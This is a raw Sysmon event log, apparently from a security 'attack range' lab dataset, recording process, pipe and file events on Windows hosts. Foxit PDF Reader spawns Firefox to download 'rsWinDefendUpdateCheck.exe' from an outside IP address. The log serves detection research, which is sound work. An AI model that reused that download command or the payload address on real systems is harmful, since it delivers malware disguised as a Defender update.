Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9888(wow64)|C:\Windows\System32\KERNELBASE.dll+d856c(wow64)|C:\Windows\System32\windows.storage.dll+1c6716(wow64)|C:\Windows\System32\windows.storage.dll+1c63d1(wow64)|C:\Windows\System32\windows.storage.dll+1c64a3(wow64)|C:\Windows\System32\windows.storage.dll+1c7175(wow64)|C:\Windows\System32\windows.storage.dll+1c6021(wow64)|C:\Windows\System32\windows.storage.dll+1c8182(wow64)|C:\Windows\System32\windows.storage.dll+1c85ec(wow64)|C:\Windows\System32\windows.storage.dll+1c8035(wow64)|C:\Windows\System32\SHELL32.dll+1a9394(wow64)|C:\Windows\System32\SHELL32.dll+1a926e(wow64)|C:\Windows\System32\SHELL32.dll+1a9069(wow64) 154100x800000000000000043307Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.482{FE4C2B44-E4A2-63C7-4706-00000000AF02}1936C:\Program Files\Mozilla Firefox\firefox.exe109.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "http://45.139.105.143/d/rsWinDefendUpdateCheck.exe"C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\ATTACKRANGE\Administrator{FE4C2B44-DDF6-63C7-BDF1-300000000000}0x30f1bd2HighMD5=66A6B001D806D3117BBA41DD55C08DE0,SHA256=0FC5FD25E5CB032AF0E867B74AD8FCB3A0F5803F3C661E398D5A03448C5CA946,IMPHASH=B9CD654B3D499FE4AD9B5E6D464FD125{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe"C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe" 10341000x800000000000000043306Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.477{FE4C2B44-D9F5-63C7-1200-00000000AF02}7565760C:\Windows\System32\svchost.exe{FE4C2B44-E4A2-63C7-4706-00000000AF02}1936C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043305Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.462{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005708C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8a4a5|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043304Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.462{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005708C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8a3be|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043303Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.462{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005708C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8a387|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000043302Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.233{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A821721AED71485245B2C91A17D3268,SHA256=C62A2DD2834684FF9E3347716402CD346DEE01C32A04E224C121ED8775C040A6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043656Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.951{FE4C2B44-E4A2-63C7-4906-00000000AF02}6604ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\shader-cache\startup_shadersMD5=738292B344BDDF59464F94E64B09C7F4,SHA256=BDA74E4AB07BDA23090332ACAC571915618789C9E9B382A0B30AA31263583231,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043655Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.942{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\pending_pings\a0cde6ac-ebf4-4d37-878c-56eb75b0dd76MD5=C0ABF074219B855D6100A777937F29FF,SHA256=AE1DE0E40199E47F7323C3351D1220CFE221BC6C6739A9FFD8C874DC1F84B455,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000043654Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.854{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E4A3-63C7-4D06-00000000AF02}2228C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043653Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.853{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E4A3-63C7-4D06-00000000AF02}2228C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000043652Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.848{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\pending_pings\3a9cce23-4a05-4a2a-886c-a02d4f7d9303MD5=D517AB65024EE96ED5272B8BA317F595,SHA256=1ABC3FE8C45B1B65C6F2B5EFA789FD13FA8E6820B769851ACB367FFA9B30A622,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000043651Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.843{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A3-63C7-4D06-00000000AF02}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+26ae7|C:\Windows\system32\lsasrv.dll+27c55|C:\Windows\system32\lsasrv.dll+26965|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043650Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.843{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A3-63C7-4D06-00000000AF02}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\system32\lsasrv.dll+268ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000043649Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:22:59.832{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240\LOCAL\cubeb-pipe-3240-2C:\Program Files\Mozilla Firefox\firefox.exe 17141700x800000000000000043648Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:22:59.832{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240\LOCAL\cubeb-pipe-3240-2C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000043647Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.813{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-E4A3-63C7-4D06-00000000AF02}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000043646Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:22:59.810{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240\gecko.3240.6744.15383047576583807458C:\Program Files\Mozilla Firefox\firefox.exe 17141700x800000000000000043645Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:22:59.810{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240\gecko.3240.6744.15383047576583807458C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000043644Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.809{FE4C2B44-E4A2-63C7-4806-00000000AF02}32406744C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E4A3-63C7-4D06-00000000AF02}2228C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+1ab6bf1|C:\Program Files\Mozilla Firefox\xul.dll+1ab4ec7|C:\Program Files\Mozilla Firefox\xul.dll+12705|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+12237|C:\Program Files\Mozilla Firefox\xul.dll+9cdfc1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000043643Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:22:59.809{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240\chrome.3240.4.143064469C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000043642Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.804{FE4C2B44-E4A2-63C7-4806-00000000AF02}32406716C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E4A3-63C7-4D06-00000000AF02}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+10a7bb|C:\Program Files\Mozilla Firefox\xul.dll+130eca0|C:\Windows\SYSTEM32\ntdll.dll+7f61d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000043641Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:22:59.804{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240\gecko-crash-server-pipe.3240C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000043640Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.764{FE4C2B44-E4A2-63C7-4806-00000000AF02}32405364C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E4A3-63C7-4D06-00000000AF02}2228C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+269b6|C:\Program Files\Mozilla Firefox\xul.dll+e8dca7|C:\Program Files\Mozilla Firefox\xul.dll+e87879|C:\Program Files\Mozilla Firefox\xul.dll+e77459|C:\Program Files\Mozilla Firefox\xul.dll+e7653c|C:\Program Files\Mozilla Firefox\xul.dll+e78bb2|C:\Program Files\Mozilla Firefox\xul.dll+c2d887|C:\Program Files\Mozilla Firefox\xul.dll+c2ac3d|C:\Program Files\Mozilla Firefox\xul.dll+24fe6b|C:\Program Files\Mozilla Firefox\xul.dll+24f993|C:\Program Files\Mozilla Firefox\xul.dll+105ab0f|C:\Program Files\Mozilla Firefox\xul.dll+1882709|C:\Program Files\Mozilla Firefox\xul.dll+1880b50|C:\Program Files\Mozilla Firefox\xul.dll+c2d021|C:\Program Files\Mozilla Firefox\xul.dll+236871|C:\Program Files\Mozilla Firefox\xul.dll+ce82ce|C:\Program Files\Mozilla Firefox\xul.dll+1870580|C:\Program Files\Mozilla Firefox\xul.dll+1822181|C:\Program Files\Mozilla Firefox\xul.dll+1d02fbf|C:\Program Files\Mozilla Firefox\xul.dll+1e7190e|C:\Program Files\Mozilla Firefox\xul.dll+1822568|C:\Program Files\Mozilla Firefox\xul.dll+1d02fbf 10341000x800000000000000043639Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.764{FE4C2B44-E4A2-63C7-4806-00000000AF02}32406744C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E4A3-63C7-4D06-00000000AF02}2228C:\Program Files\Mozilla Firefox\firefox.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+9e834a|C:\Program Files\Mozilla Firefox\xul.dll+ebac4|C:\Program Files\Mozilla Firefox\xul.dll+2581e76|C:\Program Files\Mozilla Firefox\xul.dll+1ab508d|C:\Program Files\Mozilla Firefox\xul.dll+12705|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+12237|C:\Program Files\Mozilla Firefox\xul.dll+9cdfc1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043638Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.764{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043637Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.764{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043636Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.764{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043635Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.764{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043634Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.764{FE4C2B44-DDF4-63C7-A004-00000000AF02}4700692C:\Windows\system32\csrss.exe{FE4C2B44-E4A3-63C7-4D06-00000000AF02}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000043633Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.764{FE4C2B44-E4A2-63C7-4806-00000000AF02}32407044C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E4A3-63C7-4D06-00000000AF02}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+6e193|C:\Windows\System32\ADVAPI32.dll+188af|C:\Program Files\Mozilla Firefox\firefox.exe+ac12|C:\Program Files\Mozilla Firefox\firefox.exe+6673|C:\Program Files\Mozilla Firefox\xul.dll+7a8fbe|C:\Program Files\Mozilla Firefox\xul.dll+9e365b|C:\Program Files\Mozilla Firefox\xul.dll+9e1625|C:\Program Files\Mozilla Firefox\xul.dll+9e934e|C:\Program Files\Mozilla Firefox\xul.dll+82fb43|C:\Program Files\Mozilla Firefox\xul.dll+17e59b8|C:\Program Files\Mozilla Firefox\xul.dll+17d1c3b|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+1f57e|C:\Program Files\Mozilla Firefox\xul.dll+833d37|C:\Program Files\Mozilla Firefox\nss3.dll+7318c|C:\Program Files\Mozilla Firefox\nss3.dll+885b1|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000043632Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.771{FE4C2B44-E4A3-63C7-4D06-00000000AF02}2228C:\Program Files\Mozilla Firefox\firefox.exe109.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3240.4.1430644698\2131142024" -childID 3 -isForBrowser -prefsHandle 4088 -prefMapHandle 4084 -prefsLen 31486 -prefMapSize 234522 -jsInitHandle 1108 -jsInitLen 246772 -a11yResourceId 64 -parentBuildID 20230112150232 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3751e970-f6ff-418e-8c4f-4816cabfea4c} 3240 "\\.\pipe\gecko-crash-server-pipe.3240" 4092 1d979c75858 tabC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\ATTACKRANGE\Administrator{FE4C2B44-DDF6-63C7-BDF1-300000000000}0x30f1bd2LowMD5=66A6B001D806D3117BBA41DD55C08DE0,SHA256=0FC5FD25E5CB032AF0E867B74AD8FCB3A0F5803F3C661E398D5A03448C5CA946,IMPHASH=B9CD654B3D499FE4AD9B5E6D464FD125{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url http://45.139.105.143/d/rsWinDefendUpdateCheck.exe 23542300x800000000000000016746Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:59.045{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E06865A2A2BDC8C0347B6BB025B6ED77,SHA256=031E611FFE9EDAC70C184C2EB3B33288C43AA7D752476FD10AECA73749C6D378,IMPHASH=00000000000000000000000000000000falsetrue 